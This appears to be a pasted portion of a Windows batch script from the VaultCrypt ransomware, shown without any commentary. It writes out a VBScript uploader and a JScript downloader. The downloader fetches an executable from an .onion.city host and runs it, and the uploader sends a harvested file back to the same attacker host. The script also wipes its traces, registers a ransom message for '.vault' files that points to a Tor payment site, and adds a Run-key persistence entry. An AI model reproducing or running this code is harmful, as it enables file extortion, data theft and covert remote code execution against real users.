  340. echo FileContents=GetFile^(FileName^) >> "%temp%\up.vbs"
  341. echo FormData=BuildFormData^(FileContents,Boundary,FileName,FieldName^) >> "%temp%\up.vbs"
  342. echo IEPostBinaryRequest DestURL,FormData,Boundary >> "%temp%\up.vbs"
  343. echo End Sub >> "%temp%\up.vbs"
  344. echo Function BuildFormData^(FileContents,Boundary,FileName,FieldName^) >> "%temp%\up.vbs"
  345. echo Dim FormData,Pre,Po >> "%temp%\up.vbs"
  346. echo Const ContentType="application/upload" >> "%temp%\up.vbs"
  347. echo Pre="--"+Boundary+vbCrLf+mpFields^(FieldName,FileName,ContentType^) >> "%temp%\up.vbs"
  348. echo Po=vbCrLf+"--"+Boundary+"--"+vbCrLf >> "%temp%\up.vbs"
  349. echo Const adLongVarBinary=205 >> "%temp%\up.vbs"
  350. echo Dim RS: Set RS=CreateObject^("ADODB.Recordset"^) >> "%temp%\up.vbs"
  351. echo RS.Fields.Append "b",adLongVarBinary,Len^(Pre^)+LenB^(FileContents^)+Len^(Po^) >> "%temp%\up.vbs"
  352. echo RS.Open >> "%temp%\up.vbs"
  353. echo RS.AddNew >> "%temp%\up.vbs"
  354. echo Dim LenData >> "%temp%\up.vbs"
  355. echo LenData=Len^(Pre^) >> "%temp%\up.vbs"
  356. echo RS^("b"^).AppendChunk^(StringToMB^(Pre^) ^& ChrB^(0^)^) >> "%temp%\up.vbs"
  357. echo Pre=RS^("b"^).GetChunk^(LenData^) >> "%temp%\up.vbs"
  358. echo RS^("b"^)="" >> "%temp%\up.vbs"
  359. echo LenData=Len^(Po^) >> "%temp%\up.vbs"
  360. echo RS^("b"^).AppendChunk^(StringToMB^(Po^) ^& ChrB^(0^)^) >> "%temp%\up.vbs"
  361. echo Po=RS^("b"^).GetChunk^(LenData^) >> "%temp%\up.vbs"
  362. echo RS^("b"^)="" >> "%temp%\up.vbs"
  363. echo RS^("b"^).AppendChunk^(Pre^) >> "%temp%\up.vbs"
  364. echo RS^("b"^).AppendChunk^(FileContents^) >> "%temp%\up.vbs"
  365. echo RS^("b"^).AppendChunk^(Po^) >> "%temp%\up.vbs"
  366. echo RS.Update >> "%temp%\up.vbs"
  367. echo FormData=RS^("b"^) >> "%temp%\up.vbs"
  368. echo RS.Close >> "%temp%\up.vbs"
  369. echo BuildFormData=FormData >> "%temp%\up.vbs"
  370. echo End Function >> "%temp%\up.vbs"
  371. echo Function IEPostBinaryRequest^(URL,FormData,Boundary^) >> "%temp%\up.vbs"
  372. echo Dim IE: Set IE=CreateObject^("InternetExplorer.Application"^) >> "%temp%\up.vbs"
  373. echo IE.Navigate URL,,,FormData,_ >> "%temp%\up.vbs"
  374. echo "Content-Type: multipart/form-data; boundary="+Boundary+vbCrLf >> "%temp%\up.vbs"
  375. echo do While IE.Busy >> "%temp%\up.vbs"
  376. echo Wait >> "%temp%\up.vbs"
  377. echo Loop >> "%temp%\up.vbs"
  378. echo On Error Resume Next >> "%temp%\up.vbs"
  379. echo IEPostBinaryRequest=IE.Document.body.innerHTML >> "%temp%\up.vbs"
  380. echo IE.Quit >> "%temp%\up.vbs"
  381. echo End Function >> "%temp%\up.vbs"
  382. echo Function mpFields^(FieldName,FileName,ContentType^) >> "%temp%\up.vbs"
  383. echo Dim MPtemplate >> "%temp%\up.vbs"
  384. echo MPtemplate="Content-Disposition: form-data; name=""{field}"";"+_ >> "%temp%\up.vbs"
  385. echo " filename=""{file}"""+vbCrLf+_ >> "%temp%\up.vbs"
  386. echo "Content-Type: {ct}"+vbCrLf+vbCrLf >> "%temp%\up.vbs"
  387. echo Dim Out >> "%temp%\up.vbs"
  388. echo Out=Replace^(MPtemplate,"{field}",FieldName^) >> "%temp%\up.vbs"
  389. echo Out=Replace^(Out,"{file}",FileName^) >> "%temp%\up.vbs"
  390. echo mpFields=Replace^(Out,"{ct}",ContentType^) >> "%temp%\up.vbs"
  391. echo End Function >> "%temp%\up.vbs"
  392. echo Function GetFile^(FileName^) >> "%temp%\up.vbs"
  393. echo Dim Stream: Set Stream=CreateObject^("ADODB.Stream"^) >> "%temp%\up.vbs"
  394. echo Stream.Type=1 >> "%temp%\up.vbs"
  395. echo Stream.Open >> "%temp%\up.vbs"
  396. echo Stream.LoadFromFile FileName >> "%temp%\up.vbs"
  397. echo GetFile=Stream.Read >> "%temp%\up.vbs"
  398. echo Stream.Close >> "%temp%\up.vbs"
  399. echo End Function >> "%temp%\up.vbs"
  400. echo Function StringToMB^(S^) >> "%temp%\up.vbs"
  401. echo Dim I,B >> "%temp%\up.vbs"
  402. echo For I=1 To Len^(S^) >> "%temp%\up.vbs"
  403. echo B=B ^& ChrB^(Asc^(Mid^(S,I,1^)^)^) >> "%temp%\up.vbs"
  404. echo Next >> "%temp%\up.vbs"
  405. echo StringToMB=B >> "%temp%\up.vbs"
  406. echo End Function >> "%temp%\up.vbs"
  407. echo Sub Wait^(^) >> "%temp%\up.vbs"
  408. echo On Error Resume Next >> "%temp%\up.vbs"
  409. echo End Sub >> "%temp%\up.vbs"
  410. echo var fp="%%temp%%\\",os="tj2es2lrxelpknfp.onion",WshShell=CreateObject^("WScript.Shell"^),fp=WshShell.ExpandEnvironmentStrings^(fp^);function CreateObject^(b^){return new ActiveXObject^(b^)}function dw^(b,d^){var c=new ActiveXObject^("MSXML2.XMLHTTP"^);c.open^("GET",b,0^);c.send^(^);new ActiveXObject^("Scripting.FileSystemObject"^);var a=new ActiveXObject^("ADODB.Stream"^);a.Open^(^);a.Type=1;a.Write^(c.ResponseBody^);a.Position=0;a.SaveToFile^(d,2^);a.Close^(^)}dw^("http://"+os+".city/p.vlt",""+fp+"ssl.exe"^); > "%temp%\ultra.js"
  411. wscript.exe //B //Nologo //T:120 "%temp%\ultra.js"
  412. if exist ssl.exe (
  413. "%temp%\ssl.exe" -f "%temp%\cookie.vlt"
  414. wscript.exe //B //Nologo //T:120 "%temp%\up.vbs" "%temp%\cookie.vlt" http://tj2es2lrxelpknfp.onion.city/x.php pf
  415. del /f /q ssl.exe
  416. )
  417. del /f /q "%temp%\ultra.js"
  418. del /f /q "%temp%\up.vbs"
  419. del /f /q "%temp%\cookie.vlt"
  420. attrib -h -r -s "%temp%\ch.vlt"
  421. del /f /q "%temp%\ch.vlt"
  422. del /f /q "%temp%\*.gpg"
  423. del /f /q "%temp%\*.exe"
  424. echo Y|assoc .vault=Vaulted
  425. echo Y|ftype "Vaulted"=mshta.exe vbscript:Execute^(^"msgbox ^"^" STORED IN VAULT:^"^"^&vbNewLine^&^"^" %%1^"^"^&vbNewLine^&vbNewLine^&ChrW^(10139^)^&^"^" Visit for key: http://restoredz4xpmuqr.onion^"^"^&vbNewLine^&vbNewLine^&^"^" [accessible only via Tor Browser: http://torproject.org]^"^",16,^"^"VaultCrypt [Permission Error: No Key]^"^":close^"^)
  426. echo Y|assoc "Vaulted"\DefaultIcon=%SystemRoot%\System32\shell32.dll,-48
  427. reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "vltnotify" /t REG_SZ /f /d "mshta %appdata%\VAULT.hta"
  428. reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "tnotify" /f
  429. del /f /q "%temp%\revault.js"
  430. reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "vltexec" /f
  431. start mshta "%temp%\VAULT.hta"
  432. del /f /q "%temp%\*.dll"
  433. attrib -s -h -r "%temp%\b.rr"
  434. del /f /q "%temp%\b.rr" >nul
  435. del /f /q %0
  436. :andy
  437. exit
RAW Paste Data